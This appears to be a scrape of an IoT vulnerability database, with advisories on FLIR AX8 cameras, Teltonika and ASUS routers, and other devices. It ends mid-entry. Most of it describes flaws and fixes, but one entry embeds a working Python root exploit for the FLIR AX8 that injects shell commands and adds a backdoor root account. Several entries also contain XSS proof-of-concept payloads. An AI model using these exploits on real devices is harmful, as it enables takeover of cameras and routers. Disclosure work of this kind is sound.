VARIoT IoT vulnerabilities database

The Dell Color Laser 1320c is a printer. Command execution vulnerability in Dell Color Laser 1320c. An attacker could use the vulnerability to execute a command.

Fastweb is a Swisscom subnet and is the main fixed network operator in Italy. FASTGate is Fastweb's latest generation of modems. There is an unauthorized remote command execution vulnerability in FastwebFASTGatemodem. An attacker can execute arbitrary commands on a remote device without authentication.

Xiaomi router is a router. There is a code execution vulnerability in the Xiaomi router. An attacker could use the vulnerability to execute arbitrary code.

A remote unauthorized access vulnerability was identified in HPE UIoT versions 1.5, 1.4.0, 1.4.1, 1.4.2, 1.2.4.2. Specifically, there is a malfunction identified in some section of the DSM portal and some DSM APIs. The impact of the malfunction is that the info can be changed by other users. HPE UIoT is a universal IoT platform from Hewlett Packard Enterprise (HPE). The platform has functions such as data analysis, currency security and synchronization management. A remote attacker could use this vulnerability to change other user information. The following versions are affected: HPE UIoT 1.5 version, 1.4.0 version, 1.4.1 version, 1.4.2 version, 1.2.4.2 version. HP UIoT is prone to an unauthorized-access vulnerability. Successful exploits may allow an attacker to obtain sensitive information or gain unauthorized administrative access. This may aid in further attacks

Dell EMC Secure Remote Services, versions prior to 3.32.00.08, contains an Information Exposure vulnerability. The log file contents store sensitive data including executed commands to generate authentication tokens which may prove useful to an attacker for crafting malicious authentication tokens for querying the application and subsequent attacks. Dell EMC ESRS virtual edition is prone to the following multiple security vulnerabilities. 1. An insecure file permission vulnerability 2. A plaintext password storage vulnerability 3. A information disclosure vulnerability Successfully exploiting this issue can allow an attacker to obtain sensitive information , to bypass certain security restrictions to perform unauthorized actions and use the sensitive data available that may aid in launching further attacks. This software is used to provide remote connection between EMC customer service and user's EMC products and solutions. An attacker could exploit this vulnerability to obtain information. Details: 1. The application contains multiple configuration files with world-readable permissions that could allow an authenticated malicious user to utilize the file contents to potentially elevate their privileges. CVSSv3 Base Score: 7.3 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H) 2. Database credentials are stored in plaintext in a configuration file. An authenticated malicious user with access to the configuration file may obtain the exposed password to gain access to the application database. CVSSv3 Base Score: 5.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) 3. Severity Rating For an explanation of Severity Ratings, refer to Dell EMC Knowledgebase article 468307 (https://support.emc.com/kb/468307). Dell EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. Legal Information Read and use the information in this Dell EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this advisory, contact Dell EMC Technical Support (https://support.emc.com/servicecenter/contactEMC/). The information set forth herein is provided "as is" without warranty of any kind. Dell EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall Dell EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of bus iness profits or special damages, even if Dell EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. Dell Product Security Incident Response Team secure@dell.com<mailto:secure@dell.com> -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEP5nobPoCj3pTvhAZgSlofD2Yi6cFAlvEhxEACgkQgSlofD2Y i6dKYQ//cRY70VtXrzbeCc/8y3ManHY8OoDga3nxgLHqs1NuBoCME4Fe1KGUPg1R j4Wxi5IXo/ZAjPxmzTZgXfs2i3KdhVFt/mYyV2qGjn2ciH6XKkEa/8MUMeEWC4p+ 6/OIdleuxie/vXH+K772gTfM477E6nKFV9G79/SKulFD+i6bkHqxmtU22aj5/V+t Cd895DDQngNMtx853euh9OuP4xMw/neEeNmcu+WSVtfoDCB0XEWPp/upExCre/2/ ThFU1bx8PP15FhzeQNzzMZHpVLPB0qG3sbFwCVsMxnpgF8PqTEaRSudi9WTZVdWw c7hKhO3nzlPYNE+br6T02d8z0CjuDc3NVW4FPt7gfKO1bkBVEvq/4MwwesBARhV1 4FUiQ1YaxC/GHTkjBhNQcy+2KpohMZEprwPY7nT2S75YLXhGs50vAPDbnzhZ+dmk EJgp4DGxwDM1sPx8HVwvqrc6R5lk+ZaULEKSmBei2bXYbcXLEEjIZYtPbEcjMHfs Uz7aRkOaG/G+Z104mkPH1mtQpnotOu0icfyOOiRtRrJW/7dcUVOdK7DqbAUwW7mA o/UwkcVJmUfz0f5Wdjv/vSBu2KgHP7QymXU57e3Lp8TOaSwK9405KVJhpXXLutPf cUQEyqIwlBw8WU5o8rm6kNWBGRfKpFF6DjU4q+9D0TSrN28N/Kk= =vLNR -----END PGP SIGNATURE-----

A cross site scripting (XSS) vulnerability on ASUS RT-AC58U 3.0.0.4.380_6516 devices allows remote attackers to inject arbitrary web script or HTML via Advanced_ASUSDDNS_Content.asp, Advanced_WSecurity_Content.asp, Advanced_Wireless_Content.asp, Logout.asp, Main_Login.asp, MobileQIS_Login.asp, QIS_wizard.htma, YandexDNS.asp, ajax_status.xml, apply.cgi, clients.asp, disk.asp, disk_utility.asp, or internet.asp. ASUS RT-AC58U The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. ASUSRT-AC58U is a wireless router product from ASUS. A cross-site scripting vulnerability exists in ASUSRT-AC58U3.0.0.4.380_6516. (Multiple files include: Advanced_ASUSDDNS_Content.asp, Advanced_WSecurity_Content.asp, Advanced_Wireless_Content.asp, Logout.asp, Main_Login.asp, MobileQIS_Login.asp, QIS_wizard.htma, YandexDNS.asp, ajax_status.xml, apply.cgi, clients.asp, Disk.asp, disk_utility.asp or internet.asp)

On ASUS RT-AC58U 3.0.0.4.380_6516 devices, remote attackers can discover hostnames and IP addresses by reading dhcpLeaseInfo data in the HTML source code of the Main_Login.asp page. ASUS RT-AC58U The device contains an information disclosure vulnerability.Information may be obtained. ASUSRT-AC58U is a wireless router product from ASUS. A security vulnerability exists in the ASUSRT-AC58U3.0.0.4.380_6516 release

FLIR AX8 thermal sensor cameras version up to and including 1.46.16 is vulnerable to Directory Traversal due to an improper access restriction. An unauthenticated, remote attacker can exploit this by sending a URI that contains directory traversal characters to disclose the contents of files located outside of the server's restricted path. NOTE: The vendor has stated that with the introduction of firmware version 1.49.16 (Jan 2023) the FLIR AX8 should no longer be affected by the vulnerability reported. Latest firmware version (as of Oct 2025, was released Jun 2024) is 1.55.16. FLIR Systems, Inc. of flir ax8 A path traversal vulnerability exists in firmware.Information may be obtained. The AX8 helps you guard against unplanned outages, service interruptions, and equipment failure.<br/><br/> The FLIR AX series camera/sensor also has built-in support to connect to industrial control equipment such as programmable logic controllers (PLCs), and allows the sharing of analysis and alarm results and simple control using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy to install, the AX8 provides continuous monitoring of electrical cabinets, process and manufacturing areas, data centers, energy generation and distribution, transportation and mass transit, storage facilities and refrigeration warehouses.The FLIR AX8 thermal sensor camera suffers from an unauthenticated arbitrary file disclosure vulnerability. This can beexploited to disclose the contents of arbitrary files via absolute path.Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)lighttpd/1.4.33PHP/5.4.14. # FLIR AX8 vulnerabilities. ### Product description: The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment. ### Summary of the 4 vulnerabilities found / What we were able to find: * [CVE-2022-37061] - Unauthenticated OS Command Injection. FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter in `res.php` endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. * [CVE-2022-37060] - Unauthenticated Directory Traversal. * [CVE-2022-37062] - Improper Access Control. A successful exploit could allow the attacker to extract usernames and hashed passwords. * [CVE-2022-37063] - Reflected cross-site scripting. FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malicious JavaScript code. ### Step by Step Example (How to Reproduce and verify) the vulnerabilities: 1. Unauthenticated Remote Command Injection. The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the POST parameter `id` can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file. The server returns a JSON response containing the contents of the `/etc/shadow` file. This command injection is due because there no sanitization check on the variable `$_POST["id"]`, line 65, and can therefore take advantage of the `shell_exec()` function to execute unexpected arbitrary shell commands. 2. Unauthenticated Directory Traversal. The endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file. The error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight. 3. Improper Access Control. The endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database. 4. Reflected cross-site scripting. In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call <img src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));>.run ### Recommendations for how to fix the 4 vulnerabilities: * Vulnerability 1: The variable `$_POST["id"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. More info: https://www.php.net/intval https://www.php.net/manual/en/function.escapeshellcmd https://www.php.net/manual/en/function.escapeshellarg * Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions. More info: https://www.php.net/manual/en/function.pathinfo * Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`. More info: https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html * Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters. More info: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html ### Reference: https://www.flir.com/products/ax8-automation/ ### Security researchers: * [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen) * [Samy Younsi] (https://www.linkedin.com/in/samy-younsi)

All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. NOTE: The vendor has stated that with the introduction of firmware version 1.49.16 (Jan 2023) the FLIR AX8 should no longer be affected by the vulnerability reported. Latest firmware version (as of Oct 2025, was released Jun 2024) is 1.55.16. FLIR Systems, Inc. of flir ax8 The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. &lt;?php<br/> 2. if (isset($_POST["action"])) {<br/> 3. if(isset($_POST["resource"]))<br/> 6. {<br/> 7. if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {<br/> 10. break;<br/> 12. }<br/> 13. break;<br/> 15. if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {<br/> 17. break;<br/> 19. }<br/> 20. break;<br/> 22. default:<br/> 23. }<br/> 25. }<br/><br/> --------------------------------------------------------------------------------<br/> /FLIR/usr/www/palette.php:<br/> --------------------------<br/> 1. &lt;?php<br/> 2. if(isset($_POST["palette"])){<br/> 3. shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]);<br/> 4. }<br/> 6. ?&gt;<br/></code><br/> --------------------------------------------------------------------------------<br/><br/>Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)lighttpd/1.4.33PHP/5.4.14. # FLIR AX8 vulnerabilities. ### Product description: The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment. * [CVE-2022-37060] - Unauthenticated Directory Traversal. FLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path. * [CVE-2022-37062] - Improper Access Control. FLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it. * [CVE-2022-37063] - Reflected cross-site scripting. FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. ### Step by Step Example (How to Reproduce and verify) the vulnerabilities: 1. The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file. The server returns a JSON response containing the contents of the `/etc/shadow` file. 2. Unauthenticated Directory Traversal. The endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file. The error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight. 3. Improper Access Control. The endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database. 4. Reflected cross-site scripting. In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call <img src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));>.run ### Recommendations for how to fix the 4 vulnerabilities: * Vulnerability 1: The variable `$_POST["id"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. More info: https://www.php.net/intval https://www.php.net/manual/en/function.escapeshellcmd https://www.php.net/manual/en/function.escapeshellarg * Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions. More info: https://www.php.net/manual/en/function.pathinfo * Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`. More info: https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html * Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters. More info: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html ### Reference: https://www.flir.com/products/ax8-automation/ ### Security researchers: * [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen) * [Samy Younsi] (https://www.linkedin.com/in/samy-younsi) . #!/usr/bin/env python # -*- coding: utf-8 -*- # # FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root Exploit # # # Vendor: FLIR Systems, Inc. The AX8 helps # you guard against unplanned outages, service interruptions, and equipment # failure. # # The FLIR AX series camera/sensor also has built-in support to connect to # industrial control equipment such as programmable logic controllers (PLCs), # and allows the sharing of analysis and alarm results and simple control # using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy # to install, the AX8 provides continuous monitoring of electrical cabinets, # process and manufacturing areas, data centers, energy generation and distribution, # transportation and mass transit, storage facilities and refrigeration warehouses. The issues can be triggered when calling # multiple unsanitized HTTP GET/POST parameters within the shell_exec function # in res.php and palette.php file. # # ============================================================================= # /FLIR/usr/www/res.php: # ---------------------- # 1. <?php # 2. if (isset($_POST["action"])) { # 3. switch ($_POST["action"]) { # 4. case "get": # 5. if(isset($_POST["resource"])) # 6. switch ($_POST["resource"]) { # 8. case ".rtp.hflip": # 9. if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) { # 10. $result = "false"; # 11. break; # 12. $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false"; # 14. break; # 15. case ".rtp.vflip": # 16. if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) { # 17. $result = "false"; # 18. break; # 19. $result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false"; # 21. break; # 22. default: # 23. $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"])); # 24. } # # ============================================================================= # /FLIR/usr/www/palette.php: # -------------------------- # 1. <?php # 2. if(isset($_POST["palette"])){ # 3. shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]); # 4. echo json_encode(array("success")); # 5. ?> # # ============================================================================= # # # Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l) # lighttpd/1.4.33 # PHP/5.4.14 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2018-5491 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php # # # 26.07.2018 # import requests import colorama import random## import time#### import json#### import sys##### import os###### piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 2: print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n' sys.exit() bannah = """ .---------------------------------. | 1984 Pictures | | | | presents | | ___ | | [| |=|{)__ | | |___| \/ ) | | /|\ /| | | / | \ | \\ | .---------------------------------. """ print bannah time.sleep(4) os.system('clear') print '\nFLIR AX8 Thermal Camera Remote Root Exploit' print 'By Zero Science Lab' ICU = ''' ```````` `./+ooosoooooo+/.` `.+ss+//:::::::://+ss+.` -oyo/::::-------:::::/oyo- `/yo+:::-------.------:::+oy/` `+yo+::---...........----:/+oy+` `/yo++/--...../+oo+:....---:/+oy/` `ss++//:-.../yhhhhhhy/...-://++ss` .ho++/::--.-yhhddddhhy-.--:://+oh. .ho+//::---/mmmmmmmmmm:---::/++oh. `ss++//::---+mNNNNNNm+---:://++ss` `/yo+//:::----+syys+-----://++oy/` `+yo++//:::-----------:://++oy+` `/yo++///:::::-:::::://+++oy/` .oyo+++////////////+++oyo. `.+ssoo++++++++++ooss+.` `./+osssssssso+/.` ```````` ''' colors = list(vars(colorama.Fore).values()) colored_chars = [random.choice(colors) + char for char in ICU] print(''.join(colored_chars)) print print '\x1b[1;37;44m'+'To freeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze on' print '\x1b[1;37;41m'+'To unfreeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze off\n' print '[*] Additional commands:' print ' [+] \'addroot\' for add root user.' print ' [+] \'exit\' for exit.\n' while True: zeTargets = 'http://'+sys.argv[1]+'/res.php' zeCommand = raw_input('\x1b[0;96;49m'+'root@neco-0J0X17:~# '+'\x1b[0m') zeHeaders = {'Cache-Control' : 'max-age=0', 'User-Agent' : 'thricer/251.4ev4h', 'Accept' : 'text/html,application/xhtml+xml', 'Accept-Encoding' : 'gzip, deflate', 'Accept-Language' : 'mk-MK,mk;q=1.7', 'Connection' : 'close', 'Connection-Type' : 'application/x-www-form-urlencoded'} zePardata = {'action' : 'get', 'resource' : ';'+zeCommand} try: zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata) print json.loads(zeRequest.text) if zeCommand.strip() == 'exit': sys.exit() if zeCommand.strip() == 'addroot': print '[+] Blind command injection using palette.php...' print '[+] Adding user \'roOt\' with password \'rewt\' in shadow file...' nuTargets = 'http://'+sys.argv[1]+'/palette.php' nuHeaders = zeHeaders nuHexstrn = ('\\x72\\x6f\\x4f\\x74\\x3a\\x24\\x31' '\\x24\\x4d\\x4a\\x4f\\x6e\\x56\\x2f' '\\x59\\x33\\x24\\x74\\x44\\x6e\\x4d' '\\x49\\x42\\x4d\\x79\\x30\\x6c\\x45' '\\x51\\x32\\x6b\\x44\\x70\\x66\\x67' '\\x54\\x4a\\x50\\x30\\x3a\\x31\\x36' '\\x39\\x31\\x34\\x3a\\x30\\x3a\\x39' '\\x39\\x39\\x39\\x39\\x3a\\x37\\x3a' '\\x3a\\x3a\\x0a\\x0d') nuPadata1 = {'palette' : '1;echo \"roOt:x:0:0:pwn:/sys:/bin/bash\" >> /etc/passwd'} nuPadata2 = {'palette' : '1;echo -n -e \"'+nuHexstrn+'\" >> /etc/shadow'} requests.post(nuTargets, headers=nuHeaders, data=nuPadata1) time.sleep(2) requests.post(nuTargets, headers=nuHeaders, data=nuPadata2) print '[*] Success!\n' else: pass except Exception: print '[*] Error!' break sys.exit()

FLIR AX8 Thermal Camera 1.32.16 contains hard-coded SSH and web panel credentials that cannot be changed through normal camera operations. Attackers can exploit these persistent credentials to gain unauthorized shell access and login to multiple camera interfaces using predefined username and password combinations. Thermal Imaging Camera For Continuous Condition and Safety Monitoring FLIR AX8 is a thermal sensor with imaging capabilities. Combining thermal and visual cameras in a small, affordable package, the AX8 provides continuous temperature monitoring and alarming capabilities to protec critical electrical and mechanical equipment. The AX8 helps you guard against unplanned outages, service interruptions, and equipment failure.<br/><br/> The FLIR AX series camera/sensor also has built-in support to connect to industrial control equipment such as programmable logic controllers (PLCs), and allows the sharing of analysis and alarm results and simple control using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy to install, the AX8 provides continuous monitoring of electrical cabinets, process and manufacturing areas, data centers, energy generation and distribution, transportation and mass transit, storage facilities and refrigeration warehouses.The devices utilizes hard-coded and credentials within its Linux distributionimage. Attacker could exploit thisvulnerability by logging in using the default credentials for the web panel or gainshell access.Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)lighttpd/1.4.33PHP/5.4.14

FLIR AX8 Thermal Camera 1.32.16 contains an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly connect to the RTSP stream using tools like VLC or FFmpeg to view and record thermal camera footage. Thermal Imaging Camera For Continuous Condition and Safety Monitoring FLIR AX8 is a thermal sensor with imaging capabilities. Combining thermal and visual cameras in a small, affordable package, the AX8 provides continuous temperature monitoring and alarming capabilities to protec critical electrical and mechanical equipment. The AX8 helps you guard against unplanned outages, service interruptions, and equipment failure.<br/><br/> The FLIR AX series camera/sensor also has built-in support to connect to industrial control equipment such as programmable logic controllers (PLCs), and allows the sharing of analysis and alarm results and simple control using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy to install, the AX8 provides continuous monitoring of electrical cabinets, process and manufacturing areas, data centers, energy generation and distribution, transportation and mass transit, storage facilities and refrigeration warehouses.The FLIR AX8 thermal sensor camera suffers an unauthenticated and unauthorized live RTSP video stream access.Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)lighttpd/1.4.33PHP/5.4.14

Teltonika RUT9XX routers with firmware before 00.05.01.1 are prone to cross-site scripting vulnerabilities in hotspotlogin.cgi due to insufficient user input sanitization. TeltonikaRUT9XXrouters (also known as LuCI) is a router product from Teltonika, Lithuania. * **Identifier** : SBA-ADV-20180410-01 * **Type of Vulnerability** : Cross Site Scripting * **Software/Product Name** : [Teltonika RUT955](https://teltonika.lt/product/rut955/) * **Vendor** : [Teltonika](https://teltonika.lt/) * **Affected Versions** : Firmware RUT9XX_R_00.05.00.5 and probably prior * **Fixed in Version** : RUT9XX_R_00.05.01.1 * **CVE ID** : CVE-2018-17533 * **CVSSv3 Vector** : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N * **CVSSv3 Base Score** : 8.2 (High) ## Vendor Description ## > RUT955 is a highly reliable and secure LTE router with I/O, GNSS and > RS232/RS485 for professional applications. Router delivers high > performance, mission-critical cellular communication and GPS location > capabilities. Source: <https://teltonika.lt/product/rut955/> ## Impact ## By exploiting the documented vulnerabilities, an attacker can execute JavaScript code in a user's browser within the origin of the router. The attacker might take over existing or future administrative web management sessions and gain access to the device. We recommend upgrading to version RUT9XX_R_00.05.01.1 or newer, which includes fixes for the vulnerabilities described in this advisory. The scripts are part of the coova-chilli captive portal. However, in firmware versions before RUT9XX_R_00.04.233 the vulnerabilities are exploitable regardless of the device configuration, even if no captive portal is configured. More concretely, the following parameters are vulnerable: * `/cgi-bin/hotspotlogin.cgi` * *If* res=failed or res=notyet * challenge * uamip * uamport * userurl The affected script outputs these input parameters in an HTML context without proper output encoding. The vulnerabilities are located in `hotspotlogin.cgi`: ```lua [...] elseif result == 2 or result == 5 then replace_tags.formHeader = [[<form name="myForm" method="post" action="]] .. loginpath .. [["> <INPUT TYPE="hidden" NAME="challenge" VALUE="]] .. challenge .. [["> <INPUT TYPE="hidden" NAME="]] .. names["uamip"] .. [[" VALUE="]] .. uamip .. [["> <INPUT TYPE="hidden" NAME="]] .. names["uamport"] .. [[" VALUE="]] .. uamport .. [["> <INPUT TYPE="hidden" NAME="]] .. names["userurl"] .. [[" VALUE="]] ..userurldecode .. [["> <INPUT TYPE="hidden" NAME="res" VALUE="]] .. res .. [[">]] replace_tags.formFooter = [[</form>]] [...] ``` As the above code snippet shows, the parameter `userurl` contains user input and is output without performing any HTML escaping. ## Proof-of-Concept ## An attacker can exploit this vulnerability by manipulating the `userurl` query parameter: ```text http://<IP>/cgi-bin/hotspotlogin.cgi?res=failed&userurl="><script>alert(1)</script><span ``` An attacker can exploit the other parameters (e.g. challenge) via POST requests: ```html <form action="http://<IP>/cgi-bin/hotspotlogin.cgi" method="post" enctype="text/plain"> <input type="hidden" name="res" value="failed&challenge=&quot;><script>alert(1)</script><span&quot;"> <input type="submit" value="challenge"> </form> ``` ## Timeline ## * `2018-04-10` identification of vulnerability in version RUT9XX_R_00.04.161 * `2018-04-16` re-test of version RUT9XX_R_00.04.172 * `2018-04-16` initial vendor contact through public address * `2018-04-18` vendor response with security contact * `2018-04-19` disclosed vulnerability to vendor security contact * `2018-04-26` vendor released fix in version RUT9XX_R_00.04.233 * `2018-07-09` notify vendor about incomplete fix in version RUT9XX_R_00.05.00.5 * `2018-07-19` vendor released fix in version RUT9XX_R_00.05.01.1 * `2018-07-25` re-test of version RUT9XX_R_00.05.01.2 * `2018-09-25` request CVE from MITRE * `2018-09-26` MITRE assigned CVE-2018-17533 * `2018-10-11` public disclosure ## References ## * Firmware Changelog: <https://wiki.teltonika.lt/index.php?title=RUT9xx_Firmware> ## Credits ## * David Gnedt ([SBA Research](https://www.sba-research.org/))

Teltonika RUT9XX routers with firmware before 00.04.233 are prone to multiple unauthenticated OS command injection vulnerabilities in autologin.cgi and hotspotlogin.cgi due to insufficient user input sanitization. This allows remote attackers to execute arbitrary commands with root privileges. TeltonikaRUT9XXrouters (also known as LuCI) is a router product from Teltonika, Lithuania. * **Identifier** : SBA-ADV-20180319-01 * **Type of Vulnerability** : OS Command Injection * **Software/Product Name** : [Teltonika RUT955](https://teltonika.lt/product/rut955/) * **Vendor** : [Teltonika](https://teltonika.lt/) * **Affected Versions** : Firmware RUT9XX_R_00.04.172 and probably prior * **Fixed in Version** : RUT9XX_R_00.04.233 * **CVE ID** : CVE-2018-17532 * **CVSSv3 Vector** : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H * **CVSSv3 Base Score** : 9.8 (Critical) ## Vendor Description ## > RUT955 is a highly reliable and secure LTE router with I/O, GNSS and > RS232/RS485 for professional applications. Router delivers high > performance, mission-critical cellular communication and GPS location > capabilities. Source: <https://teltonika.lt/product/rut955/> ## Impact ## An attacker can fully compromise the device, by exploiting the vulnerabilities documented in this advisory. Sensitive data stored or transmitted via the device might get exposed through this attack. We recommend upgrading to version RUT9XX_R_00.04.233 or newer, which includes fixes for the vulnerabilities described in this advisory. The scripts are part of the coova-chilli captive portal. However, the vulnerabilities are exploitable regardless of the device configuration, even if no captive portal is configured. More concretely, the following parameters are vulnerable: * `/cgi-bin/autologin.cgi` * reply * uamport * challenge * userurl * res * reason * *If* res=success * uamip * uamport * userurl * `/cgi-bin/hotspotlogin.cgi` * *If* send=1 * uamip * TelNum * challenge * uamport * userurl * *If* button=1 or (res=wispr and UserName=1) * uamport * uamip * *If* res=success or res=already or res=popup2 * uamip * uamport * *If* res=logoff or res=popup3 * uamip * uamport The affected scripts use these parameters to build OS commands via string concatenation without proper sanitization. The vulnerabilities are located in the source files `hotspotlogin.cgi` and `landing_page_functions.lua`, which is included from `autologin.cgi` and `hotspotlogin.cgi`. For example, it provides the function `getParam`, which directly passes the argument to `io.popen`: ```lua [...] function getParam(string) local h = io.popen(string) local t = h:read() h:close() return t end [...] ``` `landing_page_functions.lua` also provides the functions `debug` and `get_ifname`, which use `os.execute` and `getParam` in an insecure way: ```lua [...] function debug(string) if debug_enable == 1 then os.execute("/usr/bin/logger -t hotspotlogin.cgi \""..string.."\"") end end [...] function get_ifname(ip) local result = getParam(format("ip addr | grep \"%s\"", ip)) local tun = string.match(result, "(tun%d+)") local ifname = "wlan0" [...] ``` For example, `hotspotlogin.cgi` makes use of the functions 